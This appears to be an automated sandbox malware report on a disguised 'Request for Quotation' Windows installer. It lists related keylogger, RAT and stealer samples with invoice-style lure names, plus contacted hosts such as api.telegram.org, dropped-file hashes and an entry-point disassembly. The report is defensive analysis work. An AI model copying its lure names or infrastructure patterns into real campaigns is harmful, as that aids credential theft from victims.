                                                                                                            pe61BNJmLf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            Halkbank_Ekstre_2024123_081142_787116.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            ozctQoBg1o.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            SPhzvjk8wx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            Q0Sh31btX8.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            o7H9XLUD9z.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            checkip.dyndns.comHesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 158.101.44.242
                                                                                                            SIPARIS TEYIT FORMU VE PROFORMA FATURA.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 193.122.6.168
                                                                                                            INVOICES.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 132.226.8.169
                                                                                                            BL-100410364195.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 193.122.130.0
                                                                                                            INQUIRY REQUEST AND PRICES_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 193.122.130.0
                                                                                                            Bank Swift and SOA PRN00720031415453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 193.122.6.168
                                                                                                            RFQ Order list #2667747.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 158.101.44.242
                                                                                                            Payment Details Ref#577767.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 132.226.247.73
                                                                                                            IBAN Payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 132.226.247.73
                                                                                                            DEKONTU.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 132.226.8.169
                                                                                                            api.telegram.orgHesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            file.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Solara.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            spoolsv.exeGet hashmaliciousRedLine, StormKitty, XWormBrowse
                                                                                                            • 149.154.167.220
                                                                                                            2477.exeGet hashmaliciousNoCry, RedLine, StormKitty, XWormBrowse
                                                                                                            • 149.154.167.220
                                                                                                            BA9qyj2c9G.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            ea4LTmpMwl.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, StealcBrowse
                                                                                                            • 149.154.167.220
                                                                                                            INVOICES.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            reallyfreegeoip.orgHesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 104.21.67.152
                                                                                                            SIPARIS TEYIT FORMU VE PROFORMA FATURA.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.67.152
                                                                                                            INVOICES.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 172.67.177.134
                                                                                                            BL-100410364195.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 172.67.177.134
                                                                                                            INQUIRY REQUEST AND PRICES_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 172.67.177.134
                                                                                                            Bank Swift and SOA PRN00720031415453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 104.21.67.152
                                                                                                            RFQ Order list #2667747.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 104.21.67.152
                                                                                                            Payment Details Ref#577767.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 172.67.177.134
                                                                                                            IBAN Payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 172.67.177.134
                                                                                                            DEKONTU.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 188.114.96.6
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            TELEGRAMRUHesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            file.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Solara.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            spoolsv.exeGet hashmaliciousRedLine, StormKitty, XWormBrowse
                                                                                                            • 149.154.167.220
                                                                                                            2477.exeGet hashmaliciousNoCry, RedLine, StormKitty, XWormBrowse
                                                                                                            • 149.154.167.220
                                                                                                            BA9qyj2c9G.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            ea4LTmpMwl.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            new.ini.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • 149.154.164.13
                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, StealcBrowse
                                                                                                            • 149.154.167.220
                                                                                                            INVOICES.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            CLOUDFLARENETUShttp://74.50.69.234/Get hashmaliciousUnknownBrowse
                                                                                                            • 104.18.95.41
                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, DarkVision Rat, LummaC Stealer, StealcBrowse
                                                                                                            • 104.21.16.9
                                                                                                            http://metrics.gocloudmaps.comGet hashmaliciousUnknownBrowse
                                                                                                            • 172.67.137.184
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 172.67.165.166
                                                                                                            Msig Insurance Europe.pdfGet hashmaliciousUnknownBrowse
                                                                                                            • 104.18.69.40
                                                                                                            download.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • 104.20.22.46
                                                                                                            x.ps1Get hashmaliciousPureLog Stealer, QuasarBrowse
                                                                                                            • 104.26.12.205
                                                                                                            cllmxIZWcQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 172.67.209.252
                                                                                                            DXzJ8Bi7WC.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 104.21.16.9
                                                                                                            IJGLxMMTaK.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 104.26.0.5
                                                                                                            UTMEMUSmeerkat.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 132.240.30.2
                                                                                                            INVOICES.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 132.226.8.169
                                                                                                            Payment Details Ref#577767.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 132.226.247.73
                                                                                                            IBAN Payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 132.226.247.73
                                                                                                            DEKONTU.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 132.226.8.169
                                                                                                            dekontu.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 132.226.247.73
                                                                                                            QUOTATION_DECQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 132.226.247.73
                                                                                                            mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 132.226.95.75
                                                                                                            16547.jsGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 132.226.8.169
                                                                                                            PO#2207008 .docmGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 132.226.8.169
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            54328bd36c14bd82ddaa0c04b25ed9adx.ps1Get hashmaliciousPureLog Stealer, QuasarBrowse
                                                                                                            • 172.67.177.134
                                                                                                            Y5kEUsYDFr.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 172.67.177.134
                                                                                                            Hesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 172.67.177.134
                                                                                                            SIPARIS TEYIT FORMU VE PROFORMA FATURA.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 172.67.177.134
                                                                                                            INVOICES.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 172.67.177.134
                                                                                                            BL-100410364195.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 172.67.177.134
                                                                                                            INQUIRY REQUEST AND PRICES_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 172.67.177.134
                                                                                                            Bank Swift and SOA PRN00720031415453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 172.67.177.134
                                                                                                            RFQ Order list #2667747.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 172.67.177.134
                                                                                                            Payment Details Ref#577767.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 172.67.177.134
                                                                                                            3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousAmadey, Credential Flusher, DarkVision Rat, LummaC Stealer, StealcBrowse
                                                                                                            • 149.154.167.220
                                                                                                            file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                                            • 149.154.167.220
                                                                                                            cllmxIZWcQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            qhjKN40R2Q.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Transferencia.lnkGet hashmaliciousXenoRATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Hesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            37f463bf4616ecd445d4a1937da06e19cllmxIZWcQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 172.217.19.174
                                                                                                            • 142.250.181.33
                                                                                                            qhjKN40R2Q.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 172.217.19.174
                                                                                                            • 142.250.181.33
                                                                                                            s0zqlmETpm.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 172.217.19.174
                                                                                                            • 142.250.181.33
                                                                                                            gorkmTnChA.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 172.217.19.174
                                                                                                            • 142.250.181.33
                                                                                                            esetonlinescanner.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 172.217.19.174
                                                                                                            • 142.250.181.33
                                                                                                            esetonlinescanner.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 172.217.19.174
                                                                                                            • 142.250.181.33
                                                                                                            h0UP1BcPk5.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 172.217.19.174
                                                                                                            • 142.250.181.33
                                                                                                            vzHOEzLbDj.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 172.217.19.174
                                                                                                            • 142.250.181.33
                                                                                                            WaveExecutor.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 172.217.19.174
                                                                                                            • 142.250.181.33
                                                                                                            Nexus-Executor.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 172.217.19.174
                                                                                                            • 142.250.181.33
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            C:\Users\user\AppData\Local\Temp\nso7880.tmp\System.dllBank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              Request for Quote and Collaboration Docs.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                Request for Quote and Collaboration Docs.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                  REQUEST FOR QUOATION AND PRICES.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    IBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                      Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                        WC10SCPMaX.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                                                          PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            CL714440147.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                              TKnBbCiX07.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                Process:C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):11264
                                                                                                                                Entropy (8bit):5.801108840712148
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:e/b2HS5ih/7i00eWz9T7PH6yeFcQMI5+Vw+EXWZ77dslFZk:ewSUmWw9T7MmnI5+/F7Kdk
                                                                                                                                MD5:FC90DFB694D0E17B013D6F818BCE41B0
                                                                                                                                SHA1:3243969886D640AF3BFA442728B9F0DFF9D5F5B0
                                                                                                                                SHA-256:7FE77CA13121A113C59630A3DBA0C8AAA6372E8082393274DA8F8608C4CE4528
                                                                                                                                SHA-512:324F13AA7A33C6408E2A57C3484D1691ECEE7C3C1366DE2BB8978C8DC66B18425D8CAB5A32D1702C13C43703E36148A022263DE7166AFDCE141DA2B01169F1C6
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Joe Sandbox View:
                                                                                                                                • Filename: Bank Swift and SOA PRN0072003410853_pdf.exe, Detection: malicious, Browse
                                                                                                                                • Filename: Request for Quote and Collaboration Docs.exe, Detection: malicious, Browse
                                                                                                                                • Filename: Request for Quote and Collaboration Docs.exe, Detection: malicious, Browse
                                                                                                                                • Filename: REQUEST FOR QUOATION AND PRICES.exe, Detection: malicious, Browse
                                                                                                                                • Filename: IBAN payment confirmation.exe, Detection: malicious, Browse
                                                                                                                                • Filename: Bank Swift and SOA PRN0072003410853_pdf.exe, Detection: malicious, Browse
                                                                                                                                • Filename: WC10SCPMaX.exe, Detection: malicious, Browse
                                                                                                                                • Filename: PayeeAdvice_HK54912_R0038704_37504.exe, Detection: malicious, Browse
                                                                                                                                • Filename: CL714440147.exe, Detection: malicious, Browse
                                                                                                                                • Filename: TKnBbCiX07.exe, Detection: malicious, Browse
                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....oS...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............................... ..`.rdata..C....0......."..............@..@.data...x....@.......&..............@....reloc..>....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1206774
                                                                                                                                Entropy (8bit):3.4406286834243858
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:z8rRdeydfTa+aRU3Pl2onuFBqMKYfMWpKJ:ofjZLngqKpK
                                                                                                                                MD5:8CF43A4B246BC533556262F5516B1E7A
                                                                                                                                SHA1:64F8C227C7E113DB85E66288341DA20731FBE0FA
                                                                                                                                SHA-256:D637111F8514E6CE07D7C37400A24BC71163A5647210C9CE79B4C6FB4045A767
                                                                                                                                SHA-512:C2F0DA5420C3B1A6AF18351EB71D77165397234921AB2D438E0F5FC329875CBF415991C3C37D5F34FECA930D1532B5C9DFAA327EF28C01A82FFFA1C345F3BB1B
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Preview:.:......,.......,.......\.......L$.......9.......:............................................................u.........................R...................................................................................................................................................G...J...............h...............................................................g...............................................................j..............................................................................................................................._.......................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):56360
                                                                                                                                Entropy (8bit):4.627551145757101
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:8NH3BldZACKhrgFgJBt1GuZOoLcoutzlEIPDn/zccQDvBZ3:IHRbeBhsFMBvGEY3Pr/zcck3
                                                                                                                                MD5:82571859C65DA2518D77D22FDAC0E8B0
                                                                                                                                SHA1:0DFDEC2B5B9878A9FD66C3054B8AD28B835DD08C
                                                                                                                                SHA-256:5FFEBC9CF96F2BD70615553E4039F2D7FB22C352DA278B1E01D428755BC8CDEA
                                                                                                                                SHA-512:B6FA725E49D024C71DC8C5F71123644B9BC447E21AB3F62458C6BD6995B7B76A9AE48B29B2E8479C1EDA7298CDE0FC53D817641B8BFFC5ABB1A4527A47871295
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Preview:.......''.9.......X...K.w....................S...[[..............|................nn.44....vv................(...........?.........++.....1...W.[[.(....0000..............,,,,.........*..).....l...:....+.ii..!!.........................i..................".p.1...................................8.3.^^^^.........W......ZZZZ..#####............J.L.kk...5..k..............T.....w.....=..7.......kkk.................RRR.8.....cc......................$.i...,...5555....'....'..........++.SS..b....bbb..EEE.........................9999.GGG..}...................IIII..............qq.zz.....88............3333333.000...{....,. ..............^^.www.....j..==.#####.........bbb..hh.... .....hhh..........r.11........))))..............}}.........N..c..........G.......,.........W........................RR...6........................ddddd....^^..H...............tt..........@...........'''''.....V....ss........ll...))).......FF.............>>.......................P.............C....;....,,...................5
                                                                                                                                Process:C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x225, components 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2929
                                                                                                                                Entropy (8bit):7.418910042244289
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:j2XBhBOaFxHfEaq1kk1YunCRbvwxhjAxnyHIvR4SnHP7oNLpLR8Fqhr:j2XBv9Fx2kkO7RihjlovpnHPCpaQ1
                                                                                                                                MD5:49DAF4E74443D8502F3229468615185F
                                                                                                                                SHA1:9BB41BF5F382EE315893366F559FA26D57A4CD5F
                                                                                                                                SHA-256:E5EE495A89E55467DB6A396F012EDB6A71D2E762CFC7FC6846FE7259528BF168
                                                                                                                                SHA-512:EE9ABC6A19215FED64584BA24736ECBA24139CD03A75530FF351C99A25628410472A28F4EE08E87CE1F75DC79396A2A9C1AC79C399720C320437BC18993B561A
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Preview:......JFIF...................................................( ..%...!1!%)+.....383-7(-.+...........+...+8+++-+-+-+--+--+7+---+7-7+-7-7++---++-+7--7-+7+-+..........."........................................E........................!.1AQq."a...2...BR....#3Cbr...S......4DUcs..................................................1!............?.................................................................................@...............@........'7.O|.(....i.<..M.4....vZ...-T.,~.&../...m.:.6..oe.;WZ]m[..:..:\.6U...........ey....F..m.I...6..G..S.z4..>..1p.*..E~OG.fQD.............I....$"@...9.g..]d.Ao..!.f../.oH..}.6.INNRm..l..ngV..+G...b$V.N...k.....=.........IR.KoG.qrJ...c..)..N[W..z.....h.R..Tm..*....ME....M....E...9.OI=.roU..%.&..a1p...;.\S..|..x..._U..L....w>...............A$...D....0s.F.)s.uy..\._7......DbE..z....r.E...r7|.1..}=......./.a.r.NJJs.........+...&..,...9.wm..V.ddlx.....e.f..4T.x.y>\..n....7.tu......M.gq[.6.......>.N.#....kzw,..(.QJ*K.L.......... .
                                                                                                                                Process:C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):461378
                                                                                                                                Entropy (8bit):1.252059381950645
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:s3tr+hilKd11tUzcxZg7SBobbR5FF7b7IvSog:sRVmQc3u9F7b76
                                                                                                                                MD5:3AD2FE4EA13486258EADDD1E5940A6D7
                                                                                                                                SHA1:06D0468A125D754D4534C182D79444DFB7A1CF61
                                                                                                                                SHA-256:E4C5F20595C446D20C978CF7B486579BA2FFC17E64B940733B40C89DF4331319
                                                                                                                                SHA-512:82328E01492BDB8B23555CB369279A5352B35E0B51A4A4AC88D9F9285BBDABA627FE01139B4F9669847252D5A59FC512B2463A364EFD5C33B83309D6A8985D59
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Preview:w......................j..........................p................................................-.......................;....................Y..........................1:....................................................................................G........B...............................................................................^.........................................................o.................'......................... .....................................F..................................................................................................................E...........................................97.....................................K...f.....r..........._...............h........+........................ ........./.............................d........m..........................b...................e.c......................................................................\...........5......t.....................b.................................
                                                                                                                                Process:C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):225641
                                                                                                                                Entropy (8bit):1.2362366155163755
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:HcPiBl7QD/ad4B+etLBBF64vscOIBiMFYnfBc1TS/HVtHlY4bDzZkmNQyFY670Fn:QaxOPt/G9V4yf7P/zZkX00b/h
                                                                                                                                MD5:94C4B93474D07658FCBD411A20E68532
                                                                                                                                SHA1:66421117EB902B48D39A1514C88C868394085FCF
                                                                                                                                SHA-256:50B1D7356F0CC22F2A9AE93A7CC9738C6BC0907724ACDB85F68F594333B706DC
                                                                                                                                SHA-512:BC1C40FF5B9FD71590E9B3E71D7B58A46E8AFBE56DFBD22C39F5DC0952ACEDC96F2BC4D8428EA0BCD75D67BD32F2B095585925CD8141063801FB128EA46F7471
                                                                                                                                Malicious:false
                                                                                                                                Preview:..........................~................................................/........[...............................................R......................R....................................................{.....................................E.........................E.....................................................8...../...................................5.............................................K...........................*.....................................k...................|.......=....................s....................................................................p...2...................................g.N................#................~......................................B..................................................J........................?............................{./.........................U................................z...........+..........................................................K..........................................A......
                                                                                                                                Process:C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):161977
                                                                                                                                Entropy (8bit):1.2465706431701635
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:j91kr2E4uLB4rAvVSJUxZOKLuPYUIlh6njQqVK+P7T6r6hI4W7lD1jBCgUpo:94irAZug+TLg1cpo
                                                                                                                                MD5:818D9B577C6A2CCB8C8D753C89B0AEED
                                                                                                                                SHA1:1912E60E75B47E0AC0B0ACDB2B320F0B36D3CE22
                                                                                                                                SHA-256:B53DFB245A8D5A0F0FAEEC7E8B4AE273522AC29FD29B33608F9BA7F9ADB90279
                                                                                                                                SHA-512:91993AA2E3E2666A3945886101B2B670CD3B0D76CF3CFFF3684DCB310FE324A1C650FAB5D5D00B8CFA49B5A7713FE2DBBA6DC2D8BB8DAC7A169495E6694CE4C6
                                                                                                                                Malicious:false
                                                                                                                                Preview:................(.R.............B...........f....H...................................................5....................................5........m............................./................?................4...............................l..........................................U..........................................................#....................M..............................................................g...................................................l..................f....................?.........................._..........................................................................u......x....................l....................~.......................S...C.............................................................................................).................l......................................................................................................................b...k................................................................
                                                                                                                                Process:C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):272109
                                                                                                                                Entropy (8bit):7.784373707745681
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:kNydfTa+6Dxh9XUVhPW4KzP5Vcu6pUZ3BqMHazBC:GydfTa+aRU3Pl2onuFBqMKA
                                                                                                                                MD5:AA6D4524C5DBEC71E84D6AA704AECDD4
                                                                                                                                SHA1:E6C70157685CA6FFB2CC4CB6847663A18A61A238
                                                                                                                                SHA-256:9DE8C350DD334BEA379A5235DDDA7C325EE1ABAD472F197D4CB6410371C921EB
                                                                                                                                SHA-512:98E9CAED8A5C47CA953D1681CD0A441538EEB02930C6EB901A8F412A245D04CC820B6323CC8E58D2FD04CBD41B5403D5255E9622362C71A317B44BE2FFCC6118
                                                                                                                                Malicious:false
                                                                                                                                Preview:.......................................LLLLL.......B..............P.VVVVVV......KKKKK...........................................................................11...........................B.Z..........%....&...6......[[......tt.....w.....QQQQ......................././/....:.............f..........gg......GG..'...........!.....=..................Z.................)))..555......`....n.i.7...................................!!!.........8888888......K.............iii........................................9....................x...........;......r........................C.......}.{{.....gggg......R..............iiii......Z...7... .....................:::...........j......gg.............z....ZZZZZZ...nn.....OO..XXX.......................ffff.j..........................__....vv.....HH.................vv..l..............l...............#............VVVVVVVVVV...>..((....................ZZZZ.....................UU."....................QQ.....................................###.YYY...cc...\\\...
                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                Entropy (8bit):7.059027947424247
                                                                                                                                TrID:
                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                File name:Request for Quotation New collaboration.exe
                                                                                                                                File size:727'801 bytes
                                                                                                                                MD5:1e4847dd3c262a4303261601f0197a42
                                                                                                                                SHA1:eaa9a7dbdf8211dbe248b739480e349c0fb56583
                                                                                                                                SHA256:cb076958b9db298f34a9eeaafc4796f6d902b19b1696b76179db10612d371608
                                                                                                                                SHA512:76620c6decf9b5ae48ddf5eda391081d568a0de7e6d87c814040614000d9b1f989466ec8a8ea9395dd45ea927a77c2f3bc848bf8910ad578bef31299801b312d
                                                                                                                                SSDEEP:12288:xlYZmcRHOAXnPlX1V6loPrHA8P4xq0xnVBTjJ:UmcdOA3PlXularHbP4xfxPJ
                                                                                                                                TLSH:89F4D01F1B069446EF9415F2B8A3DE8351F5BEBC217933456DA2FE1780B6F703A4A488
                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L.....oS.................`...*......Z3.......p....@
                                                                                                                                Icon Hash:058cc0e474936126
                                                                                                                                Entrypoint:0x40335a
                                                                                                                                Entrypoint Section:.text
                                                                                                                                Digitally signed:false
                                                                                                                                Imagebase:0x400000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                Time Stamp:0x536FD79B [Sun May 11 20:03:39 2014 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:4
                                                                                                                                OS Version Minor:0
                                                                                                                                File Version Major:4
                                                                                                                                File Version Minor:0
                                                                                                                                Subsystem Version Major:4
                                                                                                                                Subsystem Version Minor:0
                                                                                                                                Import Hash:e221f4f7d36469d53810a4b5f9fc8966
                                                                                                                                Instruction
                                                                                                                                sub esp, 000002D4h
                                                                                                                                push ebx
                                                                                                                                push ebp
                                                                                                                                push esi
                                                                                                                                push edi
                                                                                                                                push 00000020h
                                                                                                                                xor ebp, ebp
                                                                                                                                pop esi
                                                                                                                                mov dword ptr [esp+14h], ebp
                                                                                                                                mov dword ptr [esp+10h], 00409230h
                                                                                                                                mov dword ptr [esp+1Ch], ebp
                                                                                                                                call dword ptr [00407034h]
                                                                                                                                push 00008001h
                                                                                                                                call dword ptr [004070BCh]
                                                                                                                                push ebp
                                                                                                                                call dword ptr [004072ACh]
                                                                                                                                push 00000008h
                                                                                                                                mov dword ptr [00429298h], eax
                                                                                                                                call 00007FAC6891B14Ch
                                                                                                                                mov dword ptr [004291E4h], eax
                                                                                                                                push ebp
                                                                                                                                lea eax, dword ptr [esp+34h]
                                                                                                                                push 000002B4h
                                                                                                                                push eax
                                                                                                                                push ebp
